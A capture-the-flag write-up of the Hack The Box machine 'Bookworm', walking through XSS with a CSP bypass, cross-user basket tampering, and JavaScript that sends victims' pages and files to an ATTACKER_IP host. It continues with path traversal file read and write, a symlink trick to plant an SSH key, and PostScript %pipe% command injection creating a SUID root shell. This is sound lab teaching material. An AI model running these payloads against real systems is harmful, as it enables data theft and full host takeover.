Bookworm was my first Insane-rated machine, and while many think it was closer to a Hard, if you’re not a fan of JavaScript, this box put you through the wringer. The box is frontloaded with a lengthy and brutal series of XSS/CSRF attacks to discover a hidden download endpoint. The download, under certain circumstances, is vulnerable to path traversal, so we can use it to leak source code and eventually find a password on the box. I’ll then exploit an internal web app to get file read, but end up pivoting to another “path traversal”-like vulnerability to write into a symlink and get SSH access as another user. The box ends with command injection into a PostScript template, which wasn’t necessarily hard to do, but more obscure.
Note to self: this writeup has been sitting in my drafts since June 2023, so this box has been out for a while.
Recon
nmap
Though the box may be Insane, only two ports are open: SSH (22/tcp) and HTTP (80/tcp).
The http-title from the scan indicates a custom domain, so I’ll add it to my /etc/hosts file so everything loads properly.
bookworm.htb
As the name would suggest, this website is for a bookstore.
We can already glean some information from looking at response headers.
We know the website is running on Express.js, and that the Content Security Policy (CSP) is script-src 'self'. This configuration only allows JavaScript loaded from the site’s own origin, so even if we can inject JavaScript into a field, it won’t run unless the browser is fetching it from http://bookworm.htb (inline scripts are blocked outright). Before creating an account to interact with the site, I want to do some directory bruteforcing and vhost fuzzing to make sure we know where our assets are. However, we don’t learn too much.
feroxbuster + ffuf
Although I truncated the feroxbuster output, it didn’t find anything we couldn’t find through walking the application.
Shopping for Exploits
I’ll create an account to start testing the shopping app. Interestingly, they ask for a lot more fields than the typical HTB machine.
Once we’re logged in, we’re redirected to /shop. The “Recent Updates” feed on the sidebar immediately catches my eye. It’s one thing to add a feed purely for cosmetics; it’s another when it keeps updating with similar names across repeated refreshes.
The /profile page lets us change our username and information at any given time. Although we know that regular XSS won’t work as a result of CSP, we encounter an interesting issue if we stick <script>alert(1)</script> inside our username.
This length check appears to be server-side and applies to basically all of the fields. We can head back to shopping and pick up a copy of Alice’s Adventures in Wonderland. At checkout, we see two more important details.
It appears you used to be able to download PDFs from your order page. If so, there may be room for server-side XSS depending on how PDFs are generated. However, it seems we will not have access to it on our fresh account.
There is a “Note” field in the order, which will likely show up somewhere else. Knowing XSS will not work, I’ll at least test for HTML injection with bold tags.
Once we place the order, we can absolutely see that HTML injection worked.
Shell as frank
Bypassing CSP
At this point, we know a few things:
We have HTML injection in the notes field of an order form.
There is a global feed that all users see, which could mean some kind of client-side attack through there.
In order to get JavaScript to execute (i.e. escalate to XSS), we need to have our own code hosted by bookworm.htb to bypass the Content Security Policy.
I spent some amount of time wandering through the source code of each page and noticed some small information disclosure on the /shop page, when the feed is populated.
Those numbers look a bit high to be order numbers since my most recent one was order 176. However, if we look through some logged HTTP requests using BurpSuite, it seems to line up with the numbering on the individual items in a basket.
Although the numbering is predictable, trying to access /basket/<number> doesn’t give us anything. The only other major function that we haven’t interacted with yet is the avatar upload on /profile. I can successfully upload image files, as one would expect, but trying any other files returns an error: “Sorry, you must upload a JPEG or a PNG!”
Trying to test upload forms without source code normally requires thorough enumeration of what extensions, MIME Types, magic bytes, etc. are and aren’t allowed. However, I managed to guess what the filter was immediately, by changing the Content-Type header.
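Based on that behavior, the server-side check is probably something as simple as this (a guess at the filter, reconstructed from the outside, not the app’s actual code):

```javascript
// Hypothetical reconstruction of the upload filter: it appears to trust the
// client-supplied Content-Type of the multipart part, not the file contents.
function isAllowedUpload(mimetype) {
  return ["image/jpeg", "image/png"].includes(mimetype);
}

// So rewriting the Content-Type header on a JavaScript upload sails through:
console.log(isAllowedUpload("image/png"));       // true
console.log(isAllowedUpload("text/javascript")); // false
```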
Most, if not all, of the requests on this website go through a redirect first, so it’s not immediately obvious that it worked until the default avatar picture went away. Looking at the HTML source, we can confirm that the upload worked by navigating to /static/img/uploads/14.
Now that we have the ability to upload whatever files we want, we can upload JavaScript to be hosted by the box. We can write all of our code into our avatar, and when we need to execute it, we can send a payload like so:
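Assuming our uploaded avatar is served from /static/img/uploads/14 (the path we confirmed above), the note payload is just a script tag pointing back at it, which satisfies script-src 'self' because the “script” comes from the site itself:

```javascript
// The CSP allows scripts from the site's own origin, and our avatar upload
// is hosted by the site -- so a script tag pointing at it runs just fine.
function makeNotePayload(avatarId) {
  return `<script src="/static/img/uploads/${avatarId}"></script>`;
}

console.log(makeNotePayload(14));
```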
We can send some basic alert() code to the avatar, and then place a new order with our XSS payload to confirm that it works.
Enumerating Other Users’ Orders
It’s great that we have a working XSS proof of concept, but right now we can only trigger it in our own browser; we need a way to get it into other people’s. From our initial recon, we know all of the profile fields have a 20 character limit, which ultimately leaves us needing to get the payload into someone else’s notes. Knowing how the flow of the application goes, it’s worth checking whether appropriate access control is in place.
If I try to fuzz other people’s orders with ffuf, I can only see orders that I have made.
Thinking back to the basket numbers we saw in the /shop HTML source, we can try to wait until a new notification pops up, and then send a POST to /basket/<id>/edit in an attempt to change that user’s note to an XSS payload. It’s a rough guess whether it’ll work; we’re betting the server only checks for a valid session cookie, not basket ownership. But it’s worth a shot.
I’ll keep refreshing the shop page to see a notification, and once I can grab their basket ID, I’ll send a request like the one below:
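The original raw request isn’t reproduced here, but it was roughly this shape (the note field name and the example basket id are assumptions; check the real order form in Burp):

```javascript
// Build the cross-user basket edit (an IDOR): any authenticated session can
// POST to another user's basket id, overwriting their note with our payload.
function buildBasketEdit(basketId, note) {
  return {
    url: `http://bookworm.htb/basket/${basketId}/edit`,
    method: "POST",
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: new URLSearchParams({ note }).toString(),
  };
}

// 5120 is a hypothetical basket id grabbed from the /shop feed.
const req = buildBasketEdit(5120, '<script src="/static/img/uploads/14"></script>');
console.log(req.url);
```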
I’ll also change the JavaScript in my avatar to a simple fetch payload.
After submitting the request, if we do it right, we get a request back at our local webserver.
We can run arbitrary JavaScript in anyone’s browser!
Strategy
In the usual XSS challenge, my first instinct would be to steal a cookie, bypass authentication, and move on with life. However, the cookies are marked with HttpOnly, meaning client-side code is not allowed to read the cookie value. This means our next best option is to crawl users’ profiles to see if we can find any sensitive information, or anything else that advances our foothold.
Before continuing, I spent a little time automating the injection of the XSS payloads so I didn’t have to bounce between multiple windows trying to win a race condition. We can automatically insert XSS into other people’s baskets using a few lines of Python.
Increasingly Ugly JavaScript
Now to make the JavaScript payload. At this point, we should break down the basic blocks of what we want to do.
I want to get a list of the orders a user has placed so I can read their notes.
Once I have a list of the orders, I want to know exactly what is in those order pages.
If doing this in JavaScript seems intimidating, my Hacker Ts writeup gives a primer on making these requests. To get the list of orders a user has placed, we can make a request to /profile, and then parse the inner HTML.
This would probably be much easier to do with regex, but that didn’t cross my mind while I was solving the box. Once we get our orderNumbers, we need to (1) check what’s in those orders, and (2) exfiltrate all of this information to our webserver.
I’ll admit, the code is a bit ugly, but there are a couple of things we’re balancing here. For one, since XMLHttpRequest works asynchronously, we need to wrangle the requests so the data from the first decides how the second request is made. The req.onreadystatechange handler does a lot of the heavy lifting there, waiting for the initial request’s state to change before continuing. We stick this in a for loop iterating over our order numbers, and boom! We have a game plan. I’ll also be using my fork of up-http-tool, where I automatically decode base64 passed to the b parameter, to make it way easier to look at this stuff.
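Put together, the victim-side payload looks something like this. It’s a sketch using fetch/await and a regex rather than the XMLHttpRequest chaining described above, and the /order/<id> path and the attacker address are assumptions:

```javascript
const ATTACKER = "http://ATTACKER_IP:8000"; // placeholder for our webserver

// Scrape order ids out of the victim's /profile HTML with a regex.
function extractOrderNumbers(html) {
  return [...html.matchAll(/\/order\/(\d+)/g)].map((m) => m[1]);
}

// Fetch each order page and ship it home, base64'd into the b parameter.
// (btoa chokes on non-Latin-1 text, but it's fine for this HTML.)
async function exfiltrateOrders() {
  const profile = await (await fetch("/profile")).text();
  for (const id of extractOrderNumbers(profile)) {
    const order = await (await fetch(`/order/${id}`)).text();
    await fetch(`${ATTACKER}/?b=${encodeURIComponent(btoa(order))}`);
  }
}
```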
Looking at the HTML, we don’t find any credentials, but we do find download links.
The message on the orders page actually hints at what has to happen next.
File Read
Users who have been on the site before (i.e. anyone but us) have access to the download endpoint, and we don’t. Accessing the downloads is going to be a little more complex, since we have to get the file, which is binary data, back to our machine. After hours of googling, I came up with this solution:
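The core of it boiled down to something like this (a reconstruction rather than the original code; the /download/<orderId> path comes from the links we scraped):

```javascript
// Convert raw bytes to base64 so a PDF survives the trip through a URL.
function bufferToBase64(buf) {
  let bin = "";
  for (const b of new Uint8Array(buf)) bin += String.fromCharCode(b);
  return btoa(bin);
}

// Grab the download inside the victim's session and exfiltrate it. Large
// files may need to be chunked across several requests.
async function exfilDownload(orderId, attacker) {
  const buf = await (await fetch(`/download/${orderId}`)).arrayBuffer();
  await fetch(`${attacker}/?b=${encodeURIComponent(bufferToBase64(buf))}`);
}
```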
You could also use .blob(), but I really wanted the base64 output so I didn’t have to write a webserver to save it as a file. Still, my approach was more complicated than it had to be; 0xdf did this pretty well.
Running this gives us a PDF of the book, but without much else in it. After playing around with this for a while, I eventually found that some users would have access to a “Download Everything” option, with the URL like so:
I forgot to URI encode the base 64, and I cannot be bothered to go back and fix it.
If we try to do directory traversal with a single parameter, it doesn’t give us anything. However, if we insert it with multiple parameters, for instance: http://bookworm.htb/download/7?bookIds=1&bookIds=../../../../etc/passwd, and then look at the zip file…
From here, we can start enumerating different files, unzipping each archive we get back. Since every XSS chain takes a long time to run, we have to be very deliberate about what we submit. My first instinct was to check /proc/self/cmdline:
We could try to guess where index.js is, or we could abuse how Linux exposes process data under /proc and grab /proc/self/cwd/index.js.
Imports in Node.js are pretty simple: if you see ./utils, that means the file is ./utils.js. ./database, in particular, stands out.
SQL wasn’t accessible from our machine based on the nmap scan, but we can try spraying that password against each user we found in /etc/passwd. Eventually, we find that it works for frank.
Shell as neil
Enumeration
Although we have frank’s password, we cannot run anything as sudo.
However, if we check for all listening ports, we see some new services that weren’t on nmap.
Checking localhost:3000 shows the original web app we were working with earlier, but localhost:3001 is a new web app.
If we try to figure out who’s running this web app, we see that it’s probably another user on the box named “neil”.
This service is only listening on the localhost, so I can use SSH tunneling to forward port 3001 on our local machine to 3001 on the remote machine. We can then view the web app in the browser instead of having to run curl commands on the other machine.
Source Code Review
The directory for the source code happens to be /home/neil/converter, which is all world-readable. Instead of trying to read the source code on the target, I’ll start an FTP server on my local machine and move the code over.
Then, I’ll tar the source code in /home/neil/converter, and run a put command in the FTP client.
The web app itself is very minimalistic. We have a single index.js running the server, and a few other directories. Most of them are empty, but calibre/ has a bunch of binaries that all seem related to file conversion.
Reading the source code, the flow of the app is as follows:
A user will upload a file, which will immediately get renamed to a UUID, concatenated with the extension the user named the file with. This is placed in the processing/ directory.
The destination is constructed similarly, with the uuid name concatenated with the output file type concatenated to the end. This is then moved to the output/ directory.
/home/neil/converter/calibre/ebook-convert is spawned with only two arguments: the original file and the output file.
If you don’t like reading source code, we also could have used pspy to see what system commands are run upon any request.
Although it seems like command injection might be possible with child.spawn(), since the two arguments are explicitly given, even sticking $(whoami) in either of the variables will not actually evaluate; it will be treated as a literal string. Checking the version using calibre --version tells us it’s version 6.11, which, at the time of writing, has no known vulnerabilities. The usage of Nunjucks might make us think it’s vulnerable to Server-Side Template Injection (SSTI), but since there’s no input being dynamically reflected in the output, that is also a no-go. Furthermore, nothing in the source code directory is writable, so hijacking is also off the table.
Fail - File Read
I’ve touched on this before in my writeup on Nahamcon’s Hacker T’s, but if we can dynamically create PDF files, we can potentially inject JavaScript and have it execute to read files and make HTTP requests from the server. Doing some testing, it seems that HTML files are supported. Using some of the payloads listed in HackTricks, I’ll try to submit the below payload.
The style isn’t something that HackTricks tells you to do, but in my experience with other challenges, making the iframe bigger makes it a lot easier to read exfiltrated data. Unfortunately, submitting this HTML to be converted to a PDF, we get an error that the result was not found. If we look at the documentation for ebook-convert, we find out why.
This pretty much shuts down the PDF approach, but there are many more potential output formats than just PDF. If we try the same payload against the EPUB format, we don’t get an error. Using Atril Document Viewer to read the file, we don’t really see anything at first. However, the page count says “1 of 2”, and jumping to page 2, we see our file.
As frank, I don’t know all of the files that neil could have. Looking in frank’s .ssh/ directory, I see that the keys are named id_ed25519 after the elliptic curve, so I can try the same name for neil. It appears that neil does have a private key at /home/neil/.ssh/id_ed25519, but when I try to SSH with it, I’m still prompted for a password.
I can check to see if there’s an authorized_keys file in the directory, and lo and behold, there isn’t.
Since the app is running as neil, we can only read files that neil can. We could continue to guess file names to potentially uncover some hidden credentials, but that feels like a “Hail Mary”. Without any way to leverage the file read to leak some kind of key or password, there’s not much this vulnerability provides for us, and we need to go back to the drawing board.
Arbitrary File Write
What is most interesting about this webapp is how the file names are constructed. If we intercept a request with Burp, attempting to convert a PDF to a DOCX, we see this.
Since we’re sending the name of the extension to the server, what if we tampered with it to put the file somewhere else? If we change docx to /../../../../../tmp/arb-write.docx, then the concatenated output becomes /home/neil/converter/output/<UUID STRING>/../../../../../tmp/arb-write.docx. If we modify the request and send this, we get a success response from the server, and more importantly, we see we can write files anywhere neil can.
With a file write, the easiest way to get a shell is to insert a public key into authorized_keys. However, as we identified earlier, neil does not have an authorized_keys file, and we can only write files that have a valid extension. Otherwise, the web app will error out.
On Symlinks
A common theme through these two vulnerabilities is that the only validation of the file name comes from ebook-convert, the binary, and nowhere else. The solution, then, is slightly subversive but makes a ton of sense. Recall that in Linux, symlinks are essentially shortcuts: anything written to the link lands in its target file or directory. I can demonstrate this on my local machine by creating a symlink called /tmp/test/portal.txt pointing at /tmp/test/authorized_keys.
Similarly, if we create a symlink on the system named “portal.txt” pointing at neil’s authorized_keys, we can’t write through it as frank, but the web app, running as neil, can. Using the file write the web app provides, we satisfy all of the conditions to put a public key in that file. The easiest way to do this would be to use my own public key, but we can also derive a public key from the private key we exfiltrated.
With that done, we can create a symlink in /tmp/an00b to the authorized_keys file. Once that’s done, we can submit this public key as a txt file, and tamper with the request again to get a file write.
We know our attempt was successful when we see this response in Burp.
We can now SSH as neil.
Shell as root
Enumeration
Running sudo -l as neil immediately points us to a target.
This doesn’t appear to be a traditional Linux binary. If I check the file type, it turns out it’s a Python script, which we also happen to have read permissions for. Reading the file, we see that it is another PDF generator, this time written in Python.
We already know the database credentials from reading the original web app’s source code, and it appears the commented-out lines about printer.bookworm-internal.htb are just flavor text, as that host is not in /etc/hosts.
We can run the Python script just to get an idea of how it works, and then view the output after transferring it back to our own machine.
Looking at the PDF, it looks like it’s just a receipt.
genlabel
The source for genlabel isn’t terribly complicated:
Examining the Python script, there are two glaring faults. The first one that stands out is SQL injection via the order ID we supply. Our input is substituted into the query using a format string, which means we can inject arbitrary SQL queries (a format string is not a prepared statement). Reusing the SQL credentials from before, however, we can see that the SQL user we control does not have very many permissions.
We already have access to the whole SQL database, so anything related to reading or writing files through SQL is off the table. However, the other major issue is that the code injects our user’s information directly into a .ps file.
If we read the file referenced by the script and do some googling, it looks to be a PostScript template, with our information inserted in the middle.
After doing some research, it appears that PostScript is actually a full programming language, used to describe pages for things like printers and PDF workflows. According to Wikipedia:
PostScript (PS) is a page description language in the electronic publishing and desktop publishing realm. It is a dynamically typed, concatenative programming language. It was created at Adobe Systems by John Warnock, Charles Geschke, Doug Brotz, Ed Taft and Bill Paxton from 1982 to 1984.
There is absolutely some way to either read/write files or get code execution with this; the challenge is just navigating the 20 character limit on each of the fields. However, since we have SQL injection, we can effectively circumvent that using a UNION statement. The challenge then becomes figuring out how to read and write files in PostScript, because the documentation is not good. This StackOverflow post does a lot of the heavy lifting for us.
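The core idiom from that post looks roughly like this (an untested reconstruction; the file operator opens a file object, and the loop copies it one byte at a time):

```postscript
% Copy output1.txt into output2.txt, one byte at a time.
/in  (output1.txt) (r) file def
/out (output2.txt) (w) file def
{ in read { out exch write } { exit } ifelse } loop
out closefile
```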
This will read from output1.txt, and then write that content to output2.txt. Since all we need is the root flag, we can grab /root/root.txt, but we could also grab files like /etc/shadow, or guess at private key names in /root/.ssh/. It’s also probably possible to turn this into an arbitrary write, but we’ll keep it simple for now. We can use a malformed input to genlabel to return this PostScript, and grab the flag.
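The injected order id then looks something like this. It’s a sketch: the column count and positions are hypothetical and have to match the actual SELECT in genlabel, which I’m not reproducing here.

```javascript
// Smuggle a long PostScript fragment past the 20-char field limit: the UNION
// row's columns become the "customer" fields pasted into the template.
function unionPayload(psFragment) {
  // Hypothetical 5-column shape -- adjust to the real query in genlabel.
  return `0 UNION SELECT '${psFragment}', '', '', '', ''`;
}

console.log(unionPayload("(/root/root.txt) (r) file"));
```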
Beyond Root
When I originally solved this box, the routes for privilege escalation were much more open, and I’ll cover two here.
Route #1 - Running a Shell Script
The first thing I googled here was “execute system commands postscript”. I eventually fell into the realm of CVEs and saw writeups for CVE-2018-19475 and CVE-2021-3781. To be clear, this version of ps2pdf, which comes from Ghostscript, is not vulnerable to any CVEs at the time of writing. However, what was interesting about the CVEs is that they were sandbox escapes that used a particular syntax. The 2018 CVE had a payload like the one below:
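The payload shape (from memory of the public PoCs, so treat the exact syntax as approximate) was:

```postscript
(%pipe%id) (w) file
```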
The %pipe% prefix tells Ghostscript that what follows should be treated as a shell command, and (w) file opens that pipe for writing, spawning the command in the process. If we look back at the Python script, ps2pdf is being called with the -dNOSAFER flag, meaning there is no sandbox, and we don’t have to worry about it at all. The box has a Ghostscript interpreter installed, so we can actually test this payload with id.
Perfect! We have command execution. To confirm this, we can change our username on the bookworm.htb webapp, and run genlabel on the box.
This is cool, but we have one problem: we still face a 20 character limit. While playing around with small commands, I ended up running env and noticed something.
Since we have control of $PWD, we can stick whatever commands we want in an executable shell script, and then call it from a relative path to meet the size requirements. I’ll write a file called a like so:
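The original script’s contents aren’t shown here; any payload works once it runs as root, and a SUID copy of bash is one simple choice (an assumption on my part, not necessarily what the box requires):

```shell
#!/bin/bash
# Runs as root when the %pipe% injection fires; drop a SUID copy of bash
# that we can use afterwards with: /tmp/rootbash -p
cp /bin/bash /tmp/rootbash
chmod u+s /tmp/rootbash
```

Remember to chmod +x the script and drop it in whatever directory genlabel runs from, since we’re calling it by a relative path.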
If I submit %pipe%./a)(w)file as my username, we get an error, but if we list the files in the directory, we see that it worked, and we get a root shell.
Route #2 - Import Malicious PostScript Template
While helping some other people with root, someone (I closed the DM; I’m sorry, I forgot your username) showed me that you could import a PostScript template, effectively circumventing the character limit altogether. We could reuse our approach from before to run longer commands without a script file, but here I’ll just read files, though writing is also a possibility. This is very similar to the intended solution, except we don’t need SQL injection at all.
The below PostScript will read in root.txt and print that out to STDOUT. I’ll put this in a.ps, naming it that way to reduce payload size.
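A reconstruction of that file, following the byte-at-a-time read idiom from the StackOverflow post referenced earlier, with an absolute path to the flag (untested against this exact interpreter):

```postscript
% Read /root/root.txt and echo it to stdout.
/in  (/root/root.txt) (r) file def
/out (%stdout) (w) file def
{ in read { out exch write } { exit } ifelse } loop
out flushfile
```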
This PDF from the University of British Columbia explains how to import PS files. We can submit a username of ./a.ps) run( to import the file. When we run genlabel again, we get an error, but we can see the flag in the stack trace, which is good enough for me, although I’m sure there’s a way to do this without throwing an exception.